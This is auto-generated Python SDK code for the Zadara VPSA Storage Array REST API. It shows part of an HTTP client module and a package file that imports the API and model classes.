encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# In the python 3, the response.data is bytes.
# we need to decode it to string.
if six.PY3:
r.data = r.data.decode('utf8')
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/Vpsa/rest.py | rest.py |
# flake8: noqa
"""
Zadara VPSA Storage Array REST API
# Overview This document outlines the methods available for administrating your Zadara Storage VPSA™. The Zadara Storage Array REST API supports form-encoded, JSON, and XML requests, and can return either JSON or XML responses. ## Usage The majority of the APIs available require authentication which requires an API token to use. You can retrieve this token through the Users section of your VPSA, or through the API using the “Return a user’s access key” API in the Users Section below. ## Authentication Methods The authentication token can be passed either through the access_key parameter inside of the body of the REST API request, or through the X-Access-Key header. ## Timeouts By default, all operations that don’t complete within five seconds will return a message informing you that the action may take some time to complete. When using the API, this can cause some actions, such as large volume creation, to be undesirably asynchronous. You can specify your own timeout with the timeout parameter, in seconds, and a timeout value of -1 specifies an infinite timeout. ## Specific Fields For Product Some of the fields/actions used in the API should be used only for a specific product. The following tags are used to mark which product responds to the fields/actions VPSA Flash Array - All Flash Array VPSA VPSA Storage Array - Hybrid VPSA ## Questions If you have any questions or need support involving the REST API, please contact for assistance. # noqa: E501
OpenAPI spec version: v23.8.4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import apis into sdk package
from Vpsa.api.consistency_groups_api import ConsistencyGroupsApi
from Vpsa.api.containers_api import ContainersApi
from Vpsa.api.controllers_api import ControllersApi
from Vpsa.api.drives_api import DrivesApi
from Vpsa.api.file_lifecycle_api import FileLifecycleApi
from Vpsa.api.file_lifecycle_policies_api import FileLifecyclePoliciesApi
from Vpsa.api.images_api import ImagesApi
from Vpsa.api.logs_api import LogsApi
from Vpsa.api.mirroring_and_cloning_api import MirroringAndCloningApi
from Vpsa.api.nas_api import NASApi
from Vpsa.api.pools_api import PoolsApi
from Vpsa.api.raid_groups_api import RAIDGroupsApi
from Vpsa.api.remote_object_storage_api import RemoteObjectStorageApi
from Vpsa.api.roles_api import RolesApi
from Vpsa.api.servers_api import ServersApi
from Vpsa.api.settings_api import SettingsApi
from Vpsa.api.snapshot_policies_api import SnapshotPoliciesApi
from Vpsa.api.tickets_api import TicketsApi
from Vpsa.api.users_api import UsersApi
from Vpsa.api.volumes_api import VolumesApi
from Vpsa.api.vpsas_api import VpsasApi
# import ApiClient
from Vpsa.api_client import ApiClient
from Vpsa.configuration import Configuration
# import models into sdk package
from Vpsa.models.body_add_directories_to_quota_project import BodyAddDirectoriesToQuotaProject
from Vpsa.models.body_add_hot_spare_to_raid_group import BodyAddHotSpareToRaidGroup
from Vpsa.models.body_add_mirror_snapshot_policy import BodyAddMirrorSnapshotPolicy
from Vpsa.models.body_add_role import BodyAddRole
from Vpsa.models.body_add_secondary_export_name import BodyAddSecondaryExportName
from Vpsa.models.body_add_user import BodyAddUser
from Vpsa.models.body_attach_flc_policy import BodyAttachFlcPolicy
from Vpsa.models.body_attach_servers_to_volume import BodyAttachServersToVolume
from Vpsa.models.body_attach_snapshot_policy import BodyAttachSnapshotPolicy
from Vpsa.models.body_attach_snapshot_policy_to_vpsa_mirror_job import BodyAttachSnapshotPolicyToVpsaMirrorJob
from Vpsa.models.body_backup_jobs_rate_limit import BodyBackupJobsRateLimit
from Vpsa.models.body_backup_jobs_update_compression import BodyBackupJobsUpdateCompression
from Vpsa.models.body_break_ros_backup_job import BodyBreakRosBackupJob
from Vpsa.models.body_break_vpsa_mirror_job import BodyBreakVpsaMirrorJob
from Vpsa.models.body_cancel_suspend_for_snapshot_set import BodyCancelSuspendForSnapshotSet
from Vpsa.models.body_change_encryption_to_aws_kms import BodyChangeEncryptionToAwsKms
from Vpsa.models.body_change_mtu_for_ni import BodyChangeMtuForNi
from Vpsa.models.body_change_nas_user_smb_password import BodyChangeNasUserSmbPassword
from Vpsa.models.body_change_ros_restore_job_mode import BodyChangeRosRestoreJobMode
from Vpsa.models.body_change_user_pass import BodyChangeUserPass
from Vpsa.models.body_change_user_pass_by_temp_code import BodyChangeUserPassByTempCode
from Vpsa.models.body_clone_mirror_job import BodyCloneMirrorJob
from Vpsa.models.body_clone_snapshot_set import BodyCloneSnapshotSet
from Vpsa.models.body_crate_ticket import BodyCrateTicket
from Vpsa.models.body_create_category import BodyCreateCategory
from Vpsa.models.body_create_clone import BodyCreateClone
from Vpsa.models.body_create_flc_policy import BodyCreateFlcPolicy
from Vpsa.models.body_create_memory_pool import BodyCreateMemoryPool
from Vpsa.models.body_create_nas_group import BodyCreateNasGroup
from Vpsa.models.body_create_nas_user import BodyCreateNasUser
from Vpsa.models.body_create_pool import BodyCreatePool
from Vpsa.models.body_create_quota_project import BodyCreateQuotaProject
from Vpsa.models.body_create_raid_group import BodyCreateRaidGroup
from Vpsa.models.body_create_remote_clone import BodyCreateRemoteClone
from Vpsa.models.body_create_ros_backup_job import BodyCreateRosBackupJob
from Vpsa.models.body_create_ros_destination import BodyCreateRosDestination
from Vpsa.models.body_create_ros_restore_job import BodyCreateRosRestoreJob
from Vpsa.models.body_create_server import BodyCreateServer
from Vpsa.models.body_create_snapshot_policy import BodyCreateSnapshotPolicy
from Vpsa.models.body_create_snapshot_set_and_resume import BodyCreateSnapshotSetAndResume
from Vpsa.models.body_create_ticket_comment import BodyCreateTicketComment
from Vpsa.models.body_create_volume import BodyCreateVolume
from Vpsa.models.body_create_volume_mirror import BodyCreateVolumeMirror
from Vpsa.models.body_create_volume_snapshot import BodyCreateVolumeSnapshot
from Vpsa.models.body_create_zcs_container import BodyCreateZcsContainer
from Vpsa.models.body_create_zcs_image import BodyCreateZcsImage
from Vpsa.models.body_create_zcs_image_repository import BodyCreateZcsImageRepository
from Vpsa.models.body_delete_category import BodyDeleteCategory
from Vpsa.models.body_delete_clone_snapshot_set import BodyDeleteCloneSnapshotSet
from Vpsa.models.body_delete_quota_project import BodyDeleteQuotaProject
from Vpsa.models.body_delete_secondary_export_name import BodyDeleteSecondaryExportName
from Vpsa.models.body_delete_server_session import BodyDeleteServerSession
from Vpsa.models.body_delete_snapshot_set import BodyDeleteSnapshotSet
from Vpsa.models.body_delete_volume import BodyDeleteVolume
from Vpsa.models.body_detach_flc_policy import BodyDetachFlcPolicy
from Vpsa.models.body_detach_servers_from_volume import BodyDetachServersFromVolume
from Vpsa.models.body_detach_snapshot_policy import BodyDetachSnapshotPolicy
from Vpsa.models.body_detach_snapshot_policy_from_vol import BodyDetachSnapshotPolicyFromVol
from Vpsa.models.body_disable_file_access_audit_conf import BodyDisableFileAccessAuditConf
from Vpsa.models.body_disable_privilege_access import BodyDisablePrivilegeAccess
from Vpsa.models.body_discover_remote_vpsa import BodyDiscoverRemoteVpsa
from Vpsa.models.body_dump_quotas_file import BodyDumpQuotasFile
from Vpsa.models.body_dump_quotas_state import BodyDumpQuotasState
from Vpsa.models.body_edit_active_directory import BodyEditActiveDirectory
from Vpsa.models.body_expand_pool import BodyExpandPool
from Vpsa.models.body_expand_volume import BodyExpandVolume
from Vpsa.models.body_fetch_volume_quotas import BodyFetchVolumeQuotas
from Vpsa.models.body_get_all_flc_policies import BodyGetAllFlcPolicies
from Vpsa.models.body_get_all_flc_policies_rules import BodyGetAllFlcPoliciesRules
from Vpsa.models.body_get_all_snapshots import BodyGetAllSnapshots
from Vpsa.models.body_get_flc_data import BodyGetFlcData
from Vpsa.models.body_get_logs import BodyGetLogs
from Vpsa.models.body_get_suggested_mirror_jobs import BodyGetSuggestedMirrorJobs
from Vpsa.models.body_get_user_details import BodyGetUserDetails
from Vpsa.models.body_get_vols_file_access_auditing_log_time import BodyGetVolsFileAccessAuditingLogTime
from Vpsa.models.body_get_vols_file_access_auditing_log_time_zip import BodyGetVolsFileAccessAuditingLogTimeZip
from Vpsa.models.body_get_volume_quota import BodyGetVolumeQuota
from Vpsa.models.body_import_volume_quotas import BodyImportVolumeQuotas
from Vpsa.models.body_issue_user_temp_code import BodyIssueUserTempCode
from Vpsa.models.body_join_active_directory import BodyJoinActiveDirectory
from Vpsa.models.body_leave_active_directory import BodyLeaveActiveDirectory
from Vpsa.models.body_migrate_volume import BodyMigrateVolume
from Vpsa.models.body_migrate_zcs_image_repository import BodyMigrateZcsImageRepository
from Vpsa.models.body_pause_file_access_audit_conf import BodyPauseFileAccessAuditConf
from Vpsa.models.body_pause_flc_policy_on_volume import BodyPauseFlcPolicyOnVolume
from Vpsa.models.body_pause_volume_snapshot_policy import BodyPauseVolumeSnapshotPolicy
from Vpsa.models.body_remove_directories_from_quota_project import BodyRemoveDirectoriesFromQuotaProject
from Vpsa.models.body_rename_category import BodyRenameCategory
from Vpsa.models.body_rename_drive import BodyRenameDrive
from Vpsa.models.body_rename_pool import BodyRenamePool
from Vpsa.models.body_rename_raid_group import BodyRenameRaidGroup
from Vpsa.models.body_rename_server import BodyRenameServer
from Vpsa.models.body_rename_snapshot_policy import BodyRenameSnapshotPolicy
from Vpsa.models.body_rename_volume import BodyRenameVolume
from Vpsa.models.body_replace_drive import BodyReplaceDrive
from Vpsa.models.body_replace_ros_backup_job_snapshot_policy import BodyReplaceRosBackupJobSnapshotPolicy
from Vpsa.models.body_reset_user_access_key import BodyResetUserAccessKey
from Vpsa.models.body_restore_active_directory import BodyRestoreActiveDirectory
from Vpsa.models.body_restore_aws_kms_store import BodyRestoreAwsKmsStore
from Vpsa.models.body_restore_encryption_password import BodyRestoreEncryptionPassword
from Vpsa.models.body_restore_encryption_password_kmip import BodyRestoreEncryptionPasswordKmip
from Vpsa.models.body_resume_broken_mirror import BodyResumeBrokenMirror
from Vpsa.models.body_resume_flc_policy_on_volume import BodyResumeFlcPolicyOnVolume
from Vpsa.models.body_set_encription_pass import BodySetEncriptionPass
from Vpsa.models.body_set_encription_pass_or_use_aws_kms_store import BodySetEncriptionPassOrUseAwsKmsStore
from Vpsa.models.body_set_encryption_password_kmip import BodySetEncryptionPasswordKmip
from Vpsa.models.body_set_global_server_connectivity_monitoring import BodySetGlobalServerConnectivityMonitoring
from Vpsa.models.body_set_multizone_read_mode import BodySetMultizoneReadMode
from Vpsa.models.body_set_nfs_domain import BodySetNfsDomain
from Vpsa.models.body_set_obs_backup_job_class import BodySetObsBackupJobClass
from Vpsa.models.body_set_pass_policy import BodySetPassPolicy
from Vpsa.models.body_set_pool_cache import BodySetPoolCache
from Vpsa.models.body_set_pool_cowcache import BodySetPoolCowcache
from Vpsa.models.body_set_recycle_bin import BodySetRecycleBin
from Vpsa.models.body_set_smb_charset import BodySetSmbCharset
from Vpsa.models.body_set_smb_netbios_name import BodySetSmbNetbiosName
from Vpsa.models.body_set_smb_trusted_domains import BodySetSmbTrustedDomains
from Vpsa.models.body_set_volume_attach_permissions import BodySetVolumeAttachPermissions
from Vpsa.models.body_set_volume_export_name import BodySetVolumeExportName
from Vpsa.models.body_show_remote_snapshots_on_cg import BodyShowRemoteSnapshotsOnCg
from Vpsa.models.body_shrink_pool import BodyShrinkPool
from Vpsa.models.body_suspend_cgs_for_snapshot_set import BodySuspendCgsForSnapshotSet
from Vpsa.models.body_switch_remote_clone_mode import BodySwitchRemoteCloneMode
from Vpsa.models.body_update_antivirus_policy import BodyUpdateAntivirusPolicy
from Vpsa.models.body_update_antivirus_properties_of_vol import BodyUpdateAntivirusPropertiesOfVol
from Vpsa.models.body_update_category import BodyUpdateCategory
from Vpsa.models.body_update_flc_policy import BodyUpdateFlcPolicy
from Vpsa.models.body_update_flc_policy_scheduling import BodyUpdateFlcPolicyScheduling
from Vpsa.models.body_update_flc_recycle_bin import BodyUpdateFlcRecycleBin
from Vpsa.models.body_update_mirror_rate_limit import BodyUpdateMirrorRateLimit
from Vpsa.models.body_update_mirror_wan_optimization import BodyUpdateMirrorWanOptimization
from Vpsa.models.body_update_pool_capacity_alerts import BodyUpdatePoolCapacityAlerts
from Vpsa.models.body_update_protection import BodyUpdateProtection
from Vpsa.models.body_update_quota_limit import BodyUpdateQuotaLimit
from Vpsa.models.body_update_raid_group_resync_speed import BodyUpdateRaidGroupResyncSpeed
from Vpsa.models.body_update_remote_vpsa_rate import BodyUpdateRemoteVpsaRate
from Vpsa.models.body_update_role import BodyUpdateRole
from Vpsa.models.body_update_ros_destination import BodyUpdateRosDestination
from Vpsa.models.body_update_server import BodyUpdateServer
from Vpsa.models.body_update_snapshot_policy import BodyUpdateSnapshotPolicy
from Vpsa.models.body_update_ssd_cool_off import BodyUpdateSsdCoolOff
from Vpsa.models.body_update_user_info import BodyUpdateUserInfo
from Vpsa.models.body_update_user_roles import BodyUpdateUserRoles
from Vpsa.models.body_update_vol_perf_threshold import BodyUpdateVolPerfThreshold
from Vpsa.models.body_update_volume_nas_options import BodyUpdateVolumeNasOptions
from Vpsa.models.body_update_volume_quotas_state import BodyUpdateVolumeQuotasState
from Vpsa.models.body_update_zcs_settings import BodyUpdateZcsSettings
from Vpsa.models.default import Default
from Vpsa.models.error import Error
from Vpsa.models.force_body import ForceBody
from Vpsa.models.inline_response200 import InlineResponse200
from Vpsa.models.inline_response2001 import InlineResponse2001
from Vpsa.models.inline_response20010 import InlineResponse20010
from Vpsa.models.inline_response200100 import InlineResponse200100
from Vpsa.models.inline_response200100_response import InlineResponse200100Response
from Vpsa.models.inline_response200100_response_sessions import InlineResponse200100ResponseSessions
from Vpsa.models.inline_response200101 import InlineResponse200101
from Vpsa.models.inline_response200101_response import InlineResponse200101Response
from Vpsa.models.inline_response200101_response_volumes import InlineResponse200101ResponseVolumes
from Vpsa.models.inline_response200102 import InlineResponse200102
from Vpsa.models.inline_response200102_response import InlineResponse200102Response
from Vpsa.models.inline_response200103 import InlineResponse200103
from Vpsa.models.inline_response200103_response import InlineResponse200103Response
from Vpsa.models.inline_response200104 import InlineResponse200104
from Vpsa.models.inline_response200104_response import InlineResponse200104Response
from Vpsa.models.inline_response200105 import InlineResponse200105
from Vpsa.models.inline_response200105_response import InlineResponse200105Response
from Vpsa.models.inline_response200106 import InlineResponse200106
from Vpsa.models.inline_response200106_response import InlineResponse200106Response
from Vpsa.models.inline_response200107 import InlineResponse200107
from Vpsa.models.inline_response200107_response import InlineResponse200107Response
from Vpsa.models.inline_response200108 import InlineResponse200108
from Vpsa.models.inline_response200108_response import InlineResponse200108Response
from Vpsa.models.inline_response200108_response_audit_configuration import InlineResponse200108ResponseAuditConfiguration
from Vpsa.models.inline_response200109 import InlineResponse200109
from Vpsa.models.inline_response20010_response import InlineResponse20010Response
from Vpsa.models.inline_response20010_response_vnis import InlineResponse20010ResponseVnis
from Vpsa.models.inline_response20011 import InlineResponse20011
from Vpsa.models.inline_response200110 import InlineResponse200110
from Vpsa.models.inline_response200110_response import InlineResponse200110Response
from Vpsa.models.inline_response200110_response_container_service_settings import InlineResponse200110ResponseContainerServiceSettings
from Vpsa.models.inline_response200110_response_container_service_settings_images_repository import InlineResponse200110ResponseContainerServiceSettingsImagesRepository
from Vpsa.models.inline_response200110_response_container_service_settings_ports import InlineResponse200110ResponseContainerServiceSettingsPorts
from Vpsa.models.inline_response200111 import InlineResponse200111
from Vpsa.models.inline_response200111_response import InlineResponse200111Response
from Vpsa.models.inline_response200112 import InlineResponse200112
from Vpsa.models.inline_response200112_response import InlineResponse200112Response
from Vpsa.models.inline_response200113 import InlineResponse200113
from Vpsa.models.inline_response200113_hash import InlineResponse200113Hash
from Vpsa.models.inline_response200114 import InlineResponse200114
from Vpsa.models.inline_response200114_response import InlineResponse200114Response
from Vpsa.models.inline_response200114_response_wwnn import InlineResponse200114ResponseWwnn
from Vpsa.models.inline_response200115 import InlineResponse200115
from Vpsa.models.inline_response200115_response import InlineResponse200115Response
from Vpsa.models.inline_response200116 import InlineResponse200116
from Vpsa.models.inline_response200117 import InlineResponse200117
from Vpsa.models.inline_response200117_response import InlineResponse200117Response
from Vpsa.models.inline_response200117_response_snapshot_policies import InlineResponse200117ResponseSnapshotPolicies
from Vpsa.models.inline_response200118 import InlineResponse200118
from Vpsa.models.inline_response200118_response import InlineResponse200118Response
from Vpsa.models.inline_response200119 import InlineResponse200119
from Vpsa.models.inline_response200119_response import InlineResponse200119Response
from Vpsa.models.inline_response200119_response_snapshot_policy import InlineResponse200119ResponseSnapshotPolicy
from Vpsa.models.inline_response20011_response import InlineResponse20011Response
from Vpsa.models.inline_response20012 import InlineResponse20012
from Vpsa.models.inline_response200120 import InlineResponse200120
from Vpsa.models.inline_response200120_response import InlineResponse200120Response
from Vpsa.models.inline_response200121 import InlineResponse200121
from Vpsa.models.inline_response200121_response import InlineResponse200121Response
from Vpsa.models.inline_response200121_response_volumes import InlineResponse200121ResponseVolumes
from Vpsa.models.inline_response200122 import InlineResponse200122
from Vpsa.models.inline_response200122_response import InlineResponse200122Response
from Vpsa.models.inline_response200122_response_tickets import InlineResponse200122ResponseTickets
from Vpsa.models.inline_response200123 import InlineResponse200123
from Vpsa.models.inline_response200123_response import InlineResponse200123Response
from Vpsa.models.inline_response200124 import InlineResponse200124
from Vpsa.models.inline_response200124_response import InlineResponse200124Response
from Vpsa.models.inline_response200124_response_comments import InlineResponse200124ResponseComments
from Vpsa.models.inline_response200125 import InlineResponse200125
from Vpsa.models.inline_response200125_response import InlineResponse200125Response
from Vpsa.models.inline_response200125_response_roles import InlineResponse200125ResponseRoles
from Vpsa.models.inline_response200125_response_users import InlineResponse200125ResponseUsers
from Vpsa.models.inline_response200126 import InlineResponse200126
from Vpsa.models.inline_response200126_response import InlineResponse200126Response
from Vpsa.models.inline_response200127 import InlineResponse200127
from Vpsa.models.inline_response200127_response import InlineResponse200127Response
from Vpsa.models.inline_response200128 import InlineResponse200128
from Vpsa.models.inline_response200128_response import InlineResponse200128Response
from Vpsa.models.inline_response200129 import InlineResponse200129
from Vpsa.models.inline_response200129_response import InlineResponse200129Response
from Vpsa.models.inline_response20012_response import InlineResponse20012Response
from Vpsa.models.inline_response20012_response_sessions import InlineResponse20012ResponseSessions
from Vpsa.models.inline_response20013 import InlineResponse20013
from Vpsa.models.inline_response200130 import InlineResponse200130
from Vpsa.models.inline_response200130_user import InlineResponse200130User
from Vpsa.models.inline_response200131 import InlineResponse200131
from Vpsa.models.inline_response200131_response import InlineResponse200131Response
from Vpsa.models.inline_response200132 import InlineResponse200132
from Vpsa.models.inline_response200132_response import InlineResponse200132Response
from Vpsa.models.inline_response200133 import InlineResponse200133
from Vpsa.models.inline_response200134 import InlineResponse200134
from Vpsa.models.inline_response200134_response import InlineResponse200134Response
from Vpsa.models.inline_response200135 import InlineResponse200135
from Vpsa.models.inline_response200135_response import InlineResponse200135Response
from Vpsa.models.inline_response200136 import InlineResponse200136
from Vpsa.models.inline_response200136_response import InlineResponse200136Response
from Vpsa.models.inline_response200137 import InlineResponse200137
from Vpsa.models.inline_response200137_response import InlineResponse200137Response
from Vpsa.models.inline_response200137_response_password_requirements_data import InlineResponse200137ResponsePasswordRequirementsData
from Vpsa.models.inline_response200138 import InlineResponse200138
from Vpsa.models.inline_response200138_response import InlineResponse200138Response
from Vpsa.models.inline_response200138_response_volumes import InlineResponse200138ResponseVolumes
from Vpsa.models.inline_response200139 import InlineResponse200139
from Vpsa.models.inline_response200139_response import InlineResponse200139Response
from Vpsa.models.inline_response200139_response_volume import InlineResponse200139ResponseVolume
from Vpsa.models.inline_response20013_response import InlineResponse20013Response
from Vpsa.models.inline_response20013_response_usages import InlineResponse20013ResponseUsages
from Vpsa.models.inline_response20014 import InlineResponse20014
from Vpsa.models.inline_response200140 import InlineResponse200140
from Vpsa.models.inline_response200140_response import InlineResponse200140Response
from Vpsa.models.inline_response200141 import InlineResponse200141
from Vpsa.models.inline_response200141_response import InlineResponse200141Response
from Vpsa.models.inline_response200141_response_volumes import InlineResponse200141ResponseVolumes
from Vpsa.models.inline_response200142 import InlineResponse200142
from Vpsa.models.inline_response200142_response import InlineResponse200142Response
from Vpsa.models.inline_response200142_response_servers import InlineResponse200142ResponseServers
from Vpsa.models.inline_response200143 import InlineResponse200143
from Vpsa.models.inline_response200143_response import InlineResponse200143Response
from Vpsa.models.inline_response200144 import InlineResponse200144
from Vpsa.models.inline_response200144_delete_volume_from_recycle_bin import InlineResponse200144DeleteVolumeFromRecycleBin
from Vpsa.models.inline_response200145 import InlineResponse200145
from Vpsa.models.inline_response200145_response import InlineResponse200145Response
from Vpsa.models.inline_response200145_response_snapshot_policies import InlineResponse200145ResponseSnapshotPolicies
from Vpsa.models.inline_response200146 import InlineResponse200146
from Vpsa.models.inline_response200146_response import InlineResponse200146Response
from Vpsa.models.inline_response200146_response_file_histories import InlineResponse200146ResponseFileHistories
from Vpsa.models.inline_response200147 import InlineResponse200147
from Vpsa.models.inline_response200147_response import InlineResponse200147Response
from Vpsa.models.inline_response200148 import InlineResponse200148
from Vpsa.models.inline_response200148_response import InlineResponse200148Response
from Vpsa.models.inline_response200149 import InlineResponse200149
from Vpsa.models.inline_response200149_response import InlineResponse200149Response
from Vpsa.models.inline_response200149_response_snapshots import InlineResponse200149ResponseSnapshots
from Vpsa.models.inline_response20014_response import InlineResponse20014Response
from Vpsa.models.inline_response20014_response_zcache_usages import InlineResponse20014ResponseZcacheUsages
from Vpsa.models.inline_response20015 import InlineResponse20015
from Vpsa.models.inline_response200150 import InlineResponse200150
from Vpsa.models.inline_response200150_response import InlineResponse200150Response
from Vpsa.models.inline_response200151 import InlineResponse200151
from Vpsa.models.inline_response200151_response import InlineResponse200151Response
from Vpsa.models.inline_response200152 import InlineResponse200152
from Vpsa.models.inline_response200152_response import InlineResponse200152Response
from Vpsa.models.inline_response200152_response_migration_job import InlineResponse200152ResponseMigrationJob
from Vpsa.models.inline_response200153 import InlineResponse200153
from Vpsa.models.inline_response200153_response import InlineResponse200153Response
from Vpsa.models.inline_response200154 import InlineResponse200154
from Vpsa.models.inline_response200154_response import InlineResponse200154Response
from Vpsa.models.inline_response200155 import InlineResponse200155
from Vpsa.models.inline_response200155_response import InlineResponse200155Response
from Vpsa.models.inline_response200156 import InlineResponse200156
from Vpsa.models.inline_response200156_response import InlineResponse200156Response
from Vpsa.models.inline_response200156_response_quotas import InlineResponse200156ResponseQuotas
from Vpsa.models.inline_response200157 import InlineResponse200157
from Vpsa.models.inline_response200157_response import InlineResponse200157Response
from Vpsa.models.inline_response200158 import InlineResponse200158
from Vpsa.models.inline_response200158_response import InlineResponse200158Response
from Vpsa.models.inline_response200159 import InlineResponse200159
from Vpsa.models.inline_response200159_response import InlineResponse200159Response
from Vpsa.models.inline_response200159_response_directories import InlineResponse200159ResponseDirectories
from Vpsa.models.inline_response200159_response_projects import InlineResponse200159ResponseProjects
from Vpsa.models.inline_response20015_response import InlineResponse20015Response
from Vpsa.models.inline_response20015_response_usages import InlineResponse20015ResponseUsages
from Vpsa.models.inline_response20016 import InlineResponse20016
from Vpsa.models.inline_response200160 import InlineResponse200160
from Vpsa.models.inline_response200160_response import InlineResponse200160Response
from Vpsa.models.inline_response200161 import InlineResponse200161
from Vpsa.models.inline_response200161_response import InlineResponse200161Response
from Vpsa.models.inline_response200162 import InlineResponse200162
from Vpsa.models.inline_response200162_response import InlineResponse200162Response
from Vpsa.models.inline_response200163 import InlineResponse200163
from Vpsa.models.inline_response200163_response import InlineResponse200163Response
from Vpsa.models.inline_response200163_response_scan_status import InlineResponse200163ResponseScanStatus
from Vpsa.models.inline_response200164 import InlineResponse200164
from Vpsa.models.inline_response200164_response import InlineResponse200164Response
from Vpsa.models.inline_response200164_response_properties import InlineResponse200164ResponseProperties
from Vpsa.models.inline_response200165 import InlineResponse200165
from Vpsa.models.inline_response200165_response import InlineResponse200165Response
from Vpsa.models.inline_response200166 import InlineResponse200166
from Vpsa.models.inline_response200166_response import InlineResponse200166Response
from Vpsa.models.inline_response200166_response_vsa import InlineResponse200166ResponseVsa
from Vpsa.models.inline_response20016_response import InlineResponse20016Response
from Vpsa.models.inline_response20016_response_disks import InlineResponse20016ResponseDisks
from Vpsa.models.inline_response20017 import InlineResponse20017
from Vpsa.models.inline_response20017_response import InlineResponse20017Response
from Vpsa.models.inline_response20017_response_disk import InlineResponse20017ResponseDisk
from Vpsa.models.inline_response20018 import InlineResponse20018
from Vpsa.models.inline_response20018_response import InlineResponse20018Response
from Vpsa.models.inline_response20018_response_disks import InlineResponse20018ResponseDisks
from Vpsa.models.inline_response20019 import InlineResponse20019
from Vpsa.models.inline_response20019_response import InlineResponse20019Response
from Vpsa.models.inline_response2001_response import InlineResponse2001Response
from Vpsa.models.inline_response2001_response_containers import InlineResponse2001ResponseContainers
from Vpsa.models.inline_response2001_response_volumes import InlineResponse2001ResponseVolumes
from Vpsa.models.inline_response2002 import InlineResponse2002
from Vpsa.models.inline_response20020 import InlineResponse20020
from Vpsa.models.inline_response20020_response import InlineResponse20020Response
from Vpsa.models.inline_response20021 import InlineResponse20021
from Vpsa.models.inline_response20021_response import InlineResponse20021Response
from Vpsa.models.inline_response20022 import InlineResponse20022
from Vpsa.models.inline_response20022_response import InlineResponse20022Response
from Vpsa.models.inline_response20022_response_usages import InlineResponse20022ResponseUsages
from Vpsa.models.inline_response20023 import InlineResponse20023
from Vpsa.models.inline_response20023_response import InlineResponse20023Response
from Vpsa.models.inline_response20023_response_categories import InlineResponse20023ResponseCategories
from Vpsa.models.inline_response20024 import InlineResponse20024
from Vpsa.models.inline_response20024_response import InlineResponse20024Response
from Vpsa.models.inline_response20025 import InlineResponse20025
from Vpsa.models.inline_response20025_response import InlineResponse20025Response
from Vpsa.models.inline_response20025_response_documents_spreadsheets_and_text_files import InlineResponse20025ResponseDocumentsSpreadsheetsAndTextFiles
from Vpsa.models.inline_response20025_response_resources import InlineResponse20025ResponseResources
from Vpsa.models.inline_response20025_response_uncategorized import InlineResponse20025ResponseUncategorized
from Vpsa.models.inline_response20025_response_usages import InlineResponse20025ResponseUsages
from Vpsa.models.inline_response20026 import InlineResponse20026
from Vpsa.models.inline_response20027 import InlineResponse20027
from Vpsa.models.inline_response20027_response import InlineResponse20027Response
from Vpsa.models.inline_response20027_response_life_cycle_policy import InlineResponse20027ResponseLifeCyclePolicy
from Vpsa.models.inline_response20028 import InlineResponse20028
from Vpsa.models.inline_response20028_response import InlineResponse20028Response
from Vpsa.models.inline_response20029 import InlineResponse20029
from Vpsa.models.inline_response20029_response import InlineResponse20029Response
from Vpsa.models.inline_response2002_response import InlineResponse2002Response
from Vpsa.models.inline_response2003 import InlineResponse2003
from Vpsa.models.inline_response20030 import InlineResponse20030
from Vpsa.models.inline_response20030_response import InlineResponse20030Response
from Vpsa.models.inline_response20030_response_images import InlineResponse20030ResponseImages
from Vpsa.models.inline_response20031 import InlineResponse20031
